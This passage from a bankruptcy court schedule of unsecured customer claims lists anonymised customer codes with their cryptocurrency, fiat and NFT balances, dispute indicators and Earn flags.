| 07366595 | | BRZ[2], BTC[.00000672], CUSDT[1], DOGE[745.31415124], TRX[292.27449266], USD[0.62] | | |
| 07366596 | | USD[10.00] | | |
| 07366597 | | USD[10.00] | | |
| 07366598 | | USD[10.00] | | |
| 07366599 | | USD[10.00] | | |
| 07366600 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07366601 | Contingent, Unliquidated | ETH[.016156], ETHW[.016156], SOL[0.00567537], USD[2482.15], USDT[.009947] | | |
| 07366603 | | USD[10.00] | | |
| 07366604 | | BTC[0], DOGE[0], LTC[0], SOL[0], USD[0.00] | Yes | |
| 07366605 | | USD[9.60] | | |
| 07366606 | | DOGE[1.00326076], TRX[135.59346936], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366607 | | BAT[1.01655549], BRZ[2], CUSDT[3], DOGE[1], SHIB[0], SOL[.00030191], TRX[3], USD[0.00] | Yes | |
| 07366610 | | DOGE[151.9560928], USD[0.00] | Yes | |
| 07366611 | | BAT[1], BRZ[1], TRX[1], USD[1352.78] | | |
| 07366612 | | USD[10.00] | | |
| 07366613 | Contingent, Disputed | AAVE[.00000001], BTC[.0000121], DOGE[0], GRT[0], LINK[.00000001], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0.10641962], YFI[0] | Yes | |
| 07366614 | | SOL[0], USD[0.00] | | |
| 07366615 | | CUSDT[1], DOGE[30.68731132], USD[6.81] | | |
| 07366616 | | DOGE[.988], NFT (311110832407800550/The Hill by FTX #6533)[1], NFT (373142561347452567/Block Buddy 0186)[1], NFT (436836299167827660/FTX Crypto Cup 2022 Key #427)[1], NFT (447241264245179379/APEFUEL by Almond Breeze #846)[1], NFT (517214205050440918/Saudi Arabia Ticket Stub #1847)[1], SOL[0.00000001], USD[12000.00] | | |
| 07366617 | | USD[10.00] | | |
| 07366618 | | DOGE[13.81234242], USD[0.00] | | |
| 07366619 | | TRX[2], USD[0.00] | | |
| 07366620 | | DOGE[147.28258476], USD[0.00] | | |
| 07366621 | | BRZ[1], BTC[0], DOGE[.02364597], TRX[.00261773], USD[0.00] | Yes | |
| 07366622 | | USD[10.00] | | |
| 07366623 | | USD[10.00] | | |
| 07366624 | | USD[10.00] | | |
| 07366626 | | BRZ[4], CUSDT[2], TRX[1826.08833094], USD[0.00], USDT[0] | | |
| 07366627 | | CUSDT[1], DOGE[24.90989468], USD[0.00] | | |
| 07366628 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07366630 | | USD[10.00] | | |
| 07366631 | | DOGE[136.99615383], USD[0.00] | | |
| 07366632 | | USD[10.00] | | |
| 07366633 | | ETH[0], SOL[0], USD[0.00] | | |
| 07366634 | | TRX[9287.64022136], USD[0.01] | | |
| 07366635 | | BAT[2.36521925], CUSDT[1], DOGE[0.60707491], GRT[.89690519], TRX[22.86044068], USD[38.25] | Yes | |
| 07366636 | | USD[12.00] | | |
| 07366637 | | USD[10.00] | | |
| 07366639 | | USD[10.00] | | |
| 07366640 | | CUSDT[1], DOGE[1188.15440472], USD[0.00] | | |
| 07366641 | | CUSDT[2], DOGE[1.00070611], GRT[.00001994], SHIB[844055.99126843], TRX[.00521949], USD[0.01] | Yes | |
| 07366642 | | BAT[1], BRZ[3], CUSDT[18], DOGE[7311.30364142], GRT[2], SHIB[4], TRX[8], USD[0.00] | | |
| 07366643 | | USD[10.00] | | |
| 07366644 | | DOGE[622.51686411], USD[10.00] | | |
| 07366645 | | USD[0.00] | | |
| 07366647 | | USD[10.00] | | |
| 07366648 | | USD[10.00] | | |
| 07366649 | | AVAX[1.19877155], BRZ[0], DOGE[4862.30709716], ETH[0.07819549], ETHW[0.07722563], MATIC[175.72528234], NFT (308579595017036765/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #52)[1], NFT (360087057923650414/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #77)[1], NFT (412200007057556983/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #36)[1], NFT (518439175713680094/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #41)[1], NFT (550783308848412658/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #49)[1], SHIB[13353141.60054176], SOL[3.12496404], SUSHI[51.64648841], TRX[5], USD[83.55] | Yes | |
| 07366650 | | USD[10.00] | | |
| 07366651 | | BTC[.0000001], CUSDT[2], DOGE[2], NFT (359458280792646045/FTX - Off The Grid Miami #325)[1], TRX[1], USD[0.01] | Yes | |
| 07366653 | | USD[10.00] | | |
| 07366655 | | DOGE[553.44962978], USD[10.00] | | |
| 07366656 | | DOGE[1], ETH[.15104827], ETHW[.15104827], SOL[31.24405064], TRX[1], USD[62.35] | | |
| 07366658 | | BAT[1.01469423], BRZ[1], BTC[.05552227], CUSDT[3], DOGE[3.000548], ETH[1.40366999], ETHW[1.4030804], GRT[1.06800861], SOL[36.75567194], TRX[2], USD[0.27] | Yes | |
| 07366660 | | BF_POINT[300], BRZ[3], CUSDT[17], DOGE[8.48168529], SUSHI[142.36125116], TRX[8.00087675], USD[0.00] | Yes | |
| 07366661 | | CUSDT[2], DOGE[4], TRX[211.69491042], USD[765.87] | | |
| 07366662 | | USD[10.00] | | |
| 07366663 | | USD[10.00] | | |
| 07366666 | | USD[10.00] | | |
| 07366667 | | BTC[.000065], SOL[297.702] | | |
| 07366669 | | USD[10.00] | | |
| 07366670 | | CUSDT[1], USD[0.00] | | |
| 07366671 | | USD[10.00] | | |
| 07366672 | | TRX[0], USD[0.00] | | |
| 07366673 | | CUSDT[3], ETH[.07039931], ETHW[.07039931], TRX[4.13508876], USD[0.00], USDT[0] | | |
| 07366674 | | USD[10.99] | Yes | |
| 07366675 | | CUSDT[2], DOGE[168.9934762], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366677 | | BRZ[2], CUSDT[2], SOL[1.83237762], USD[0.00], USDT[1] | | |
| 07366679 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07366680 | | BTC[0], NFT (419503449682419391/SolMee #9002)[1], NFT (536100907775866688/Jungle Jams - Audius Edition)[1], USD[4004.60], USDT[0] | | |
| 07366681 | | USD[10.00] | | |
| 07366682 | | DOGE[125.7801672], USD[0.00] | | |
| 07366683 | | DOGE[.00750739], USD[0.00] | | |
| 07366685 | | USD[10.00] | | |
| 07366686 | | USD[10.00] | | |
| 07366688 | | DOGE 9116438], USD[0.00] | | |
| 07366689 | | BTC[.000199], USD[0.00] | | |
| 07366690 | | BTC[0], CAD[0.00], DOGE[16.983], LTC[0], USD[0.04], USDT[1.03818669] | | |
| 07366691 | | BTC[0], CUSDT[2], USD[0.00], USDT[31.64665025] | Yes | |
| 07366692 | | BTC[0], SUSHI[.17605] | | |
| 07366694 | | BRZ[1], DOGE[2522.72229838], TRX[1], USD[10.00] | | |
| 07366698 | | DOGE[204.1321241], USD[0.00] | | |
| 07366699 | | TRX[203.50194283], USD[0.00] | | |
| 07366700 | | DOGE[1.57418069], TRX[1], USD[0.01] | | |
| 07366702 | | USD[10.00] | | |
| 07366703 | | CUSDT[2], DOGE[22852.51705469], SOL[1], TRX[2], USD[0.00] | | |
| 07366704 | | USD[10.00] | | |
| 07366705 | | USD[10.00] | | |
| 07366706 | | BTC[.0019613], CUSDT[1], DOGE[1207.89484542], USD[0.00] | | |
| 07366707 | | BAT[1.01655549], BCH[0], BTC[0.00217703], CUSDT[12], ETH[1.11560799], ETHW[1.11513937], LTC[3.44819314], TRX[3], USD[0.00] | Yes | |
| 07366709 | | BAT[14.64332241], CUSDT[1], USD[0.00], USDT[1] | | |
| 07366710 | | USD[0.00] | | |
| 07366711 | | BAT[.08572592], BTC[0], CUSDT[2], DOGE[0], ETH[0], LTC[0], TRX[2.62772047], USD[0.00] | | |
| 07366714 | | USD[0.00] | Yes | |
| 07366715 | | DOGE[38.89666386], USD[0.00] | Yes | |
| 07366717 | | USD[0.01] | | |
| 07366718 | | BAT[2.11553294], BRZ[3], CUSDT[9], DOGE[12.76854636], ETH[0], GRT[2.06917255], SOL[0], SUSHI[1.0983162], TRX[10.02540211], USD[0.00], USDT[3.26749446] | Yes | |
| 07366719 | | USD[10.00] | | |
| 07366720 | | GRT[3.82901097], USD[0.00] | | |
| 07366721 | | USD[10.00] | | |
| 07366722 | | CUSDT[5], DOGE[7], SOL[0], TRX[0], USD[0.01], USDT[1] | | |
| 07366723 | | TRX[183.27726881], USD[0.00] | | |
| 07366724 | | BRZ[2], DOGE[.29632695], TRX[75.98271484], USD[0.00] | | |
| 07366725 | | BRZ[2], CUSDT[5], DOGE[2], SHIB[1], USD[3667.70] | Yes | |
| 07366726 | | USD[10.00] | | |
| 07366727 | | USD[10.00] | | |
| 07366728 | | BRZ[2], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07366729 | | DOGE[3], LINK[184.07607685], SOL[.00000604], USD[10.00] | | |
| 07366730 | | USD[10.00] | | |
| 07366731 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07366732 | | DOGE[7012.80883842], GRT[9.91443259], TRX[2], USD[0.00] | | |
| 07366733 | | USD[10.00] | | |
| 07366734 | | BRZ[1], BTC[.00093543], CUSDT[1], DOGE[0], USD[0.07] | | |
| 07366735 | | BRZ[1], USD[0.01] | | |
| 07366736 | | BRZ[1], CUSDT[2], TRX[1], USD[0.00], USDT[0] | | |
| 07366737 | | BRZ[0], BTC[0], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07366738 | | BCH[0], BTC[0], ETH[0], GRT[0], TRX[0], USD[0.00] | | |
| 07366740 | | DOGE[14.32073509], USD[0.00], USDT[0] | | |
| 07366741 | | USD[10.00] | | |
| 07366742 | | BAT[0], BCH[0.00058984], DOGE[6974.96346275], ETH[0.00848701], LTC[.94413677], MATIC[55.07383348], MKR[0.01542092], SHIB[125030302.27058801], SOL[16.11820856], SUSHI[60.92082172], TRX[500.49189575], USD[265.56], USDT[0], YFI[0.00343957] | Yes | |
| 07366743 | | DOGE[104.03588201], USD[0.00] | Yes | |
| 07366744 | | USD[10.00] | | |
| 07366745 | | USD[10.00] | | |
| 07366746 | | USD[10.00] | | |
| 07366747 | | DOGE[236.95694208], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366748 | | USD[0.00] | | |
| 07366749 | | CUSDT[3], SHIB[6], TRX[1], USD[0.00] | | |
| 07366752 | | BRZ[1], CUSDT[1], DOGE[3], LINK[1.91392324], USD[0.00], USDT[19.87027452] | | |
| 07366753 | | SOL[.2281303], USD[0.00] | Yes | |
| 07366754 | | USD[11.03] | Yes | |
| 07366755 | | DOGE[27.19320322], USD[0.00] | | |
| 07366756 | | BRZ[2], DOGE[.09657972], ETH[.00002346], ETHW[.00002346], TRX[4], USD[0.06] | | |
| 07366757 | | ETH[0], SOL[0], USD[0.00], USDT[0.00000077] | | |
| 07366758 | | CUSDT[2], DOGE[643.54892937], SHIB[905141.20202751], USD[70.00] | | |
| 07366759 | | CUSDT[1], DOGE[1], USD[94.91] | | |
| 07366760 | | USD[10.00] | | |
| 07366762 | | CUSDT[4], ETH[0], TRX[1], USD[0.00] | | |
| 07366764 | | SOL[0], USD[0.01] | | |
| 07366767 | | USD[10.00] | | |
| 07366768 | | USD[10.00] | | |
| 07366769 | | CUSDT[1], DOGE[1019.00240934], USD[0.00] | | |
| 07366770 | | CUSDT[1], DOGE[133.73743392], TRX[2], USD[0.00] | | |
| 07366771 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07366772 | | USD[10.00] | | |
| 07366774 | | DOGE[.456], USD[6.69] | | |
| 07366775 | | BCH[.23262579], DOGE[5900.17292554], KSHIB[4418.71602686], SHIB[4645290.91915586], TRX[1], USD[0.00] | Yes | |
| 07366776 | | CUSDT[8], DOGE[102.9483144], TRX[1], USD[67.29] | | |
| 07366777 | | BRZ[2], CUSDT[1], USD[10.00] | | |
| 07366778 | | BAT[20.07326984], CUSDT[1], DOGE[467.08875745], SUSHI[2.05318982], USD[0.00] | | |
| 07366779 | | USD[10.00] | | |
| 07366780 | | DOGE[59.22232909], USD[0.00] | | |
| 07366781 | | USD[10.00] | | |
| 07366783 | | USD[10.00] | | |
| 07366784 | | USD[0.01] | | |
| 07366785 | | BCH[0], BTC[0], CUSDT[4], DOGE[0], USD[0.00] | Yes | |
| 07366786 | | USD[10.00] | | |
| 07366787 | | USD[10.00] | | |
| 07366788 | | BAT[0.00005265], BCH[.00000001], BRZ[0.0000002], BTC[0], DOGE[0], ETH[0], GRT[0.00000001], LINK[0.00000001], LTC[0.00000010], SOL[0], SUSHI[0.00000001], TRX[0.00006010], USD[0.00], USDT[0.00000004] | | |
| 07366790 | | BRZ[1], DOGE[1603.56273153], USD[110.00] | | |
| 07366791 | | USD[10.00] | | |
| 07366792 | | USD[10.00] | | |
| 07366793 | | BTC[.00018007], USD[0.00] | | |
| 07366794 | | BRZ[1], CUSDT[3], DOGE[.00003138], USD[0.00] | | |
| 07366795 | | CUSDT[1], USD[0.00] | | |
| 07366796 | | DOGE[396.90914993], USD[0.00] | | |
| 07366797 | | USD[0.00] | | |
| 07366798 | | USD[12.23] | | |
| 07366799 | | USD[10.00] | | |
| 07366800 | | CUSDT[1], DOGE[237.9751828], USD[0.00] | | |
| 07366801 | | USD[10.00] | | |
| 07366802 | | DOGE[1175.66649186], ETH[.02966526], ETHW[.02966526], USD[10.00] | | |
| 07366803 | | ETH[.00000001], ETHW[0], USD[4.00] | | |
| 07366805 | | USD[10.00] | | |
| 07366806 | | BTC[.00016345], USD[0.00], USDT[0] | | |
| 07366807 | | USD[10.00] | | |
| 07366808 | | USD[10.00] | | |
| 07366809 | | BRZ[1], DOGE[367.24272844], TRX[1], USD[0.00] | | |
| 07366810 | | USD[10.00] | | |
| 07366811 | | DOGE[28.48650054], USD[0.00] | | |
| 07366812 | | ETH[.0059139], ETHW[.0059139], USD[0.00] | | |
| 07366814 | | USD[0.00] | Yes | |
| 07366815 | | USD[10.00] | | |
| 07366816 | | CUSDT[4], DOGE[194354.74445165], TRX[1], USD[0.00] | | |

Amended Schedule F-12 priority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366818 | | CUSDT[2], DOGE[2], TRX[1], USD[0.00] | | |
| 07366819 | | DOGE[154.64338604], USD[0.00] | Yes | |
| 07366820 | | BTC[.010029], LTC[22.68273179], USD[0.12] | | |
| 07366821 | | USD[0.00] | Yes | |
| 07366822 | | USD[4.41], USDT[0.00000001], YFI[.00158349] | Yes | |
| 07366823 | | BTC[0], SOL[0], USD[0.00] | | |
| 07366824 | | USD[10.00] | | |
| 07366826 | | USD[10.00] | | |
| 07366827 | | TRX[1], USD[0.00], USDT[0] | | |
| 07366828 | | CUSDT[4], DOGE[487.96895493], SHIB[103996.43440796], SUSHI[1.12364905], TRX[1], USD[0.32] | | |
| 07366830 | | BAT[14.02105249], USD[0.00] | | |
| 07366831 | | USD[10.00] | | |
| 07366832 | | CUSDT[2], USD[0.00] | | |
| 07366833 | | BTC[0], CUSDT[3], DOGE[850.98706584], TRX[930.2101075], USD[0.00] | | |
| 07366834 | | DOGE[1199.80000119], USD[10.00] | | |
| 07366836 | | DOGE[2320.648], USD[4.56], USDT[0] | | |
| 07366839 | | DOGE[2400.03589283], USD[0.00], USDT[0] | | |
| 07366840 | | BRZ[3], CUSDT[2], DOGE[13035.06926915], ETH[.56522423], ETHW[.56498687], LTC[2.26864844], SHIB[7793885.12809525], TRX[1250.79699113], USD[0.00], USDT[1.10908324] | Yes | |
| 07366841 | | USD[10.00] | | |
| 07366842 | | BAT[0], BCH[0], BTC[0], DOGE[1], GRT[0], LTC[0], SHIB[171134328.92003921], SOL[0], SUSHI[0], TRX[1], USD[2.91], USDT[0] | Yes | |
| 07366843 | | CUSDT[7], DOGE[73.67331771], GRT[77.48495354], LINK[5.64619603], MATIC[94.77533476], SOL[.8336003], SUSHI[1.92917358], TRX[421.09302853], USD[0.73] | Yes | |
| 07366844 | | CUSDT[2], GRT[1], TRX[3], USD[0.01] | | |
| 07366845 | | CUSDT[1], DOGE[306.22059365], USD[0.00] | | |
| 07366846 | | USD[30.00] | | |
| 07366847 | | USD[10.00] | | |
| 07366848 | | USD[10.00] | | |
| 07366849 | | CUSDT[138.5174048], DOGE[.94926524], TRX[183.20088214], USD[0.18] | | |
| 07366850 | | USD[10.00] | | |
| 07366851 | | USD[10.00] | | |
| 07366852 | | DOGE[3339.06872522], SHIB[3803877.12731796], TRX[1], USD[0.00] | Yes | |
| 07366853 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07366855 | | DOGE[149.33164498], SHIB[1], USD[0.00] | Yes | |
| 07366858 | | BTC[.0005312], USD[10.00] | | |
| 07366860 | | USD[10.00] | | |
| 07366861 | | CUSDT[2], DOGE[559.61304525], TRX[1], USD[0.00] | | |
| 07366863 | | USD[10.00] | | |
| 07366864 | | KSHIB[271.66870327], USD[0.00] | Yes | |
| 07366865 | | USD[10.00] | | |
| 07366866 | | MATIC[6.23058813], USD[0.00] | Yes | |
| 07366867 | | ETH[0], ETHW[0], USD[0.28], USDT[0] | Yes | |
| 07366868 | | USD[10.00] | | |
| 07366870 | | BCH[0], BRZ[0], BTC[0], DOGE[4.56750681], ETH[0], EUR[0.00], GRT[0], LTC[0], TRX[2], UNI[0], USD[0.00] | | |
| 07366871 | | USD[10.00] | | |
| 07366872 | | USD[10.00] | | |
| 07366873 | | USD[0.06] | | |
| 07366874 | | BAT[.00001397], BCH[.00008558], BRZ[492.02470582], BTC[.00588658], CUSDT[37.8522819], DAI[.00181087], DOGE[9148.91549284], ETH[.20648649], ETHW[.20627176], SHIB[2590849.84107227], TRX[7.41652646], USD[1.00], USDT[0.11326909] | Yes | |
| 07366875 | | USD[10.00] | | |
| 07366876 | | BTC[0], CUSDT[16], DAI[0], DOGE[1], ETH[0], MATIC[0], SHIB[7857.21975452], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07366877 | | DOGE[1.00075127], ETH[0], USD[0.00] | Yes | |
| 07366880 | | CUSDT[1], DOGE[0], ETH[0], USD[0.00] | | |
| 07366881 | | AUD[0.05], CUSDT[14], DOGE[8.42820671], TRX[33.60945718], USD[0.77] | | |
| 07366882 | | CUSDT[1], USD[0.00] | | |
| 07366883 | | USD[0.31] | | |
| 07366884 | | USD[10.00] | | |
| 07366885 | | DOGE[1], USD[0.00] | | |
| 07366886 | | USD[11.03] | Yes | |
| 07366887 | | DOGE[184.92389457], USD[0.00] | | |
| 07366888 | | USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366889 | | BTC[0], ETH[0], ETHW[0], GRT[0], SOL[0], UNI[0], USD[0.00], USDT[0] | | |
| 07366890 | | AAVE[0], BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GBP[0.00], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], SHIB[7880.11911298], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07366891 | | DOGE[164.22192228], USD[0.00] | | |
| 07366892 | | USD[10.00] | | |
| 07366893 | | USD[10.00] | | |
| 07366894 | | USD[10.00] | | |
| 07366895 | | CUSDT[2], DOGE[18.81609817], USD[0.00] | | |
| 07366898 | | BRZ[1], DOGE[1.00002748], GRT[1], TRX[1], USD[0.00] | | |
| 07366900 | | BRZ[3], CUSDT[7], DOGE[1359.72240281], NFT (359762118299865703/Astral Apes #676)[1], NFT (512874111610684648/Astral Apes #1986)[1], NFT (527340197859803481/3D CATPUNK #4755)[1], SHIB[13105824.62421638], SOL[1.1414602], TRX[2319.94802658], USD[6.16] | Yes | |
| 07366901 | | USD[10.00] | | |
| 07366902 | | BRZ[0], DOGE[0], USD[0.00] | | |
| 07366903 | | CUSDT[1], DOGE[2323.26222903], USD[0.00] | Yes | |
| 07366904 | | CUSDT[28128.39389991], DOGE[2399.66584753], TRX[2883.27682957], USD[0.00] | | |
| 07366905 | | DOGE[190.46527046], USD[0.00] | | |
| 07366906 | | USD[10.00] | | |
| 07366907 | | CUSDT[1], DOGE[1], GRT[1], USD[413.29] | | |
| 07366908 | | BRZ[3], BTC[0], CUSDT[6], DOGE[0], USD[0.00] | | |
| 07366909 | | BRZ[1], DOGE[1962.06285498], TRX[1], USD[0.00] | | |
| 07366910 | | USD[10.00] | | |
| 07366911 | | USD[10.00] | | |
| 07366912 | | BRZ[4], BTC[0], CUSDT[4], DOGE[5.00000151], LINK[0], TRX[9], USD[2116.17], USDT[4] | | |
| 07366914 | | BTC[0], DOGE[0], ETH[0], LINK[0], SOL[0], TRX[1], USD[0.01], USDT[0.00001893] | | |
| 07366915 | | USD[10.00] | | |
| 07366917 | | CUSDT[1], DOGE[1267.07870214], TRX[1], USD[0.00] | | |
| 07366918 | | BRZ[1], SUSHI[0], USD[10.00] | | |
| 07366919 | | BAT[1], BF_POINT[300], BRZ[1], CUSDT[7], DOGE[15541.64208649], ETH[3.091635], ETHW[3.09035944], SHIB[23125749.93059391], SOL[26.39815833], TRX[5], USD[2594.44], USDT[2.11122022] | Yes | |
| 07366920 | | USD[10.00] | | |
| 07366921 | | USD[10.00] | | |
| 07366922 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07366923 | | BTC[0], DOGE[2], USD[0.00] | | |
| 07366924 | | CUSDT[1], TRX[50.94330444], USD[2.51] | | |
| 07366925 | | CUSDT[1], DOGE[2759.79552561], USD[0.01] | | |
| 07366926 | | USD[10.00] | | |
| 07366927 | | USD[10.00] | | |
| 07366929 | | DOGE[1], TRX[1], USD[0.06] | | |
| 07366932 | | USD[10.00] | | |
| 07366933 | | CUSDT[1], DOGE[0], TRX[0.04154419], USD[4.04] | Yes | |
| 07366934 | | BRZ[2], USD[10.00] | | |
| 07366935 | | SHIB[1], USD[306.72] | Yes | |
| 07366936 | | TRX[1], USD[0.00], USDT[9.93811417] | | |
| 07366937 | | BTC[0.00006802], ETH[.00147646], ETHW[.00147646], TRX[106.56577303], USD[0.00] | | |
| 07366938 | | CUSDT[3], USD[0.00] | Yes | |
| 07366939 | | USD[10.00] | | |
| 07366940 | | BRZ[2], CUSDT[29], TRX[1], USD[0.00] | | |
| 07366941 | | USD[0.00], USDT[0] | | |
| 07366942 | | USD[0.01] | Yes | |
| 07366943 | | BAT[0], BCH[0], BRZ[0], BTC[0.00000014], DOGE[0], ETH[0], LINK[0], LTC[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07366944 | | BRZ[1], CUSDT[13], DOGE[1], ETH[.00111133], ETHW[.00109765], SOL[.04039098], TRX[1], USD[1.62] | Yes | |
| 07366945 | | DOGE[55.54752239], USD[0.00] | Yes | |
| 07366946 | | USD[10.00] | | |
| 07366947 | | DOGE[.69617027], USD[6.29] | | |
| 07366948 | | USD[10.00] | | |
| 07366949 | | USD[10.00] | | |
| 07366950 | | SUSHI[.50584346], USD[0.00] | | |
| 07366951 | | BRZ[1], CUSDT[2], DOGE[2], SUSHI[8.21133094], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07366952 | | CUSDT[6.06151034], USD[0.01] | | |
| 07366953 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366955 | | BTC[0.00313255], SHIB[2], USD[0.00] | | |
| 07366956 | | USD[0.00] | | |
| 07366957 | | GRT[40.14045312], USD[0.00] | | |
| 07366958 | | BRZ[1], CUSDT[1], USD[0.01], USDT[0] | | |
| 07366959 | | USD[10.00] | | |
| 07366960 | | TRX[1], USD[89.69] | | |
| 07366961 | | USD[10.00] | | |
| 07366962 | | USD[10.00] | | |
| 07366963 | | USD[10.00] | | |
| 07366964 | | BAT[1], BRZ[1], BTC[.04515069], CUSDT[1], DOGE[1861.86417416], ETH[.30246557], ETHW[.30240209], LINK[26.56989543], SHIB[1398145.84435316], TRX[4], USD[0.00] | Yes | |
| 07366965 | | USD[0.00] | | |
| 07366966 | Contingent, Disputed | BF_POINT[100], BTC[0], CUSDT[5], SHIB[0.00000011], SOL[0], USD[0.00] | Yes | |
| 07366967 | | USD[0.06] | | |
| 07366968 | | CUSDT[1], SOL[0.39341080], USD[0.00] | Yes | |
| 07366969 | | USD[10.00] | | |
| 07366970 | | DOGE[1], GRT[4.28585549], USD[0.00] | Yes | |
| 07366971 | | USD[10.00] | | |
| 07366972 | | USD[10.00] | | |
| 07366973 | | CUSDT[2], USD[0.00] | | |
| 07366974 | | DOGE[156.73049564], USD[0.00] | Yes | |
| 07366976 | | USD[10.00] | | |
| 07366977 | | USD[10.00] | | |
| 07366978 | | TRX[1], USD[0.00] | | |
| 07366982 | | USD[0.00] | | |
| 07366983 | | AUD[1.26], BCH[.00144437], BRZ[5.35700357], BTC[.00001762], DOGE[16.95804258], ETH[.00052799], ETHW[.00052799], LTC[.0044588], PAXG[.00054746], TRX[16.99329767], USD[0.00], USDT[.99440734] | | |
| 07366984 | | BAT[1.01245377], BRZ[3], CUSDT[8], DOGE[12.36901404], ETHW[3.70102994], GRT[2], NFT (454848123069845029/Entrance Voucher #4052)[1], TRX[6], USD[0.01] | Yes | |
| 07366985 | | SHIB[1230.08441746], TRX[1], USD[0.01] | | |
| 07366986 | | USD[0.00] | Yes | |
| 07366988 | | USD[10.00] | | |
| 07366990 | | USD[10.00] | | |
| 07366991 | | USD[0.00] | Yes | |
| 07366992 | | BRZ[3], CUSDT[19], DOGE[2], ETH[.00000001], TRX[4], USD[0.00] | | |
| 07366993 | | DOGE[1416.00458644], ETH[.00039686], ETHW[.00039686], TRX[1], USD[24.28] | | |
| 07366994 | | USD[10.00] | | |
| 07366996 | | USD[10.00] | | |
| 07366997 | | USD[10.00] | | |
| 07366998 | | USD[10.00] | | |
| 07366999 | | BRZ[2], CUSDT[3], DOGE[5.09803787], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07367000 | | USD[0.00], YFI[.00022345] | Yes | |
| 07367001 | | BAT[1], BRZ[2], CUSDT[5], TRX[5], USD[0.01], USDT[2] | | |
| 07367002 | | CUSDT[1], DOGE[19.30641814], SUSHI[0], TRX[2.00003316], USD[0.00] | | |
| 07367003 | | DOGE[31.50672602], USD[0.00], USDT[0.93315365] | Yes | |
| 07367005 | | USD[10.00] | | |
| 07367006 | | CUSDT[5], USD[0.00] | | |
| 07367009 | | CUSDT[1], USD[0.00] | | |
| 07367010 | | USD[0.00] | | |
| 07367012 | | USD[10.00] | | |
| 07367013 | | USD[10.00] | | |
| 07367014 | | DOGE[24.03841242], USD[0.00] | | |
| 07367016 | | BRZ[3], CUSDT[6], TRX[4], USD[0.00] | | |
| 07367017 | | USD[10.00] | | |
| 07367018 | | CUSDT[1], DOGE[4790.72369101], NFT (457263598890345330/Entrance Voucher #4156)[1], SUSHI[.96078896], USD[210.79] | | |
| 07367019 | | SOL[0] | | |
| 07367020 | | BTC[.00000087], USD[0.00] | | |
| 07367021 | | DOGE[0], GRT[1], TRX[0], USD[0.00] | | |
| 07367023 | | USD[10.00] | | |
| 07367024 | | USD[10.00] | | |
| 07367025 | | BAT[0], BRZ[1], BTC[0], CUSDT[2], DOGE[0], GRT[2.00105965], TRX[7], USD[841.16], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367026 | | BRZ[1], BTC[.00000005], CUSDT[3.14826694], DOGE[85.40872737], SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07367027 | | USD[0.34] | | |
| 07367028 | | ETH[0], SHIB[0], SOL[0.00000001], USD[0.00] | Yes | |
| 07367029 | | USD[10.00] | | |
| 07367030 | | BRZ[1], CUSDT[2], DOGE[13342.80549655], ETH[.06359027], ETHW[.06279912], TRX[2], USD[21.78] | Yes | |
| 07367031 | | CUSDT[3], USD[0.00] | | |
| 07367032 | | USD[0.01] | | |
| 07367034 | | BRZ[1], BTC[0], CUSDT[18], DOGE[48.35638585], GRT[0], LINK[.00000679], LTC[.000031], SHIB[3], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07367037 | | DOGE[1], USD[0.01] | | |
| 07367038 | | BAT[1], BRZ[3], CUSDT[1], USD[0.00] | | |
| 07367039 | | USD[20.00] | | |
| 07367041 | | CUSDT[2], USD[0.01] | | |
| 07367042 | | TRX[175.46805665], USD[0.00] | | |
| 07367043 | | USD[10.00] | | |
| 07367044 | | AAVE[0.00000138], BAT[0], BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0.00000113], ETHW[0.00000113], GRT[0.00057314], LINK[0], LTC[0], MATIC[0.00047905], MKR[0.00000021], SOL[0.00002301], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07367045 | | DOGE[20.66337278], USD[0.00] | | |
